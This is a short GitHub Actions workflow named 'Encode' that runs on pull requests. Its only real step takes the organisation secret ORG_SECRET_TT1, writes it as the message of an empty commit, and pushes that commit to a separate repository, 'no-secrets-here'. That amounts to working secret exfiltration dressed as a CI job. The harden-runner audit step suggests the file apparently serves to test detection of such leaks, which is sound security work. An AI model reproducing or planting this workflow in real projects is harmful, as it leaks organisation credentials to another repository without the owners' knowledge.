name: Encode
on: 
  workflow_dispatch:
  pull_request:

permissions:
  contents: write

jobs:
  run-ci:
    runs-on: ubuntu-latest
    steps:
      - name: Harden the runner (Audit all outbound calls)
        uses: step-security/harden-runner@f4a75cfd619ee5ce8d5b864b0d183aff3c69b55a # v2.13.1
        with:
          egress-policy: audit

      - shell: bash
        env: 
          ORG_SECRET: ${{ secrets.ORG_SECRET_TT1 }}
        run: | 
          COMMIT_MSG="${ORG_SECRET}"

          # Clone the target repository
          git clone https://github.com/org-deacc-sec/no-secrets-here.git
          cd no-secrets-here
          git config --global user.email "friend@github.com"
          git config --global user.name "${{ github.event.repository.name }}"
  
          git commit --allow-empty -m "${COMMIT_MSG}"
          git push origin main
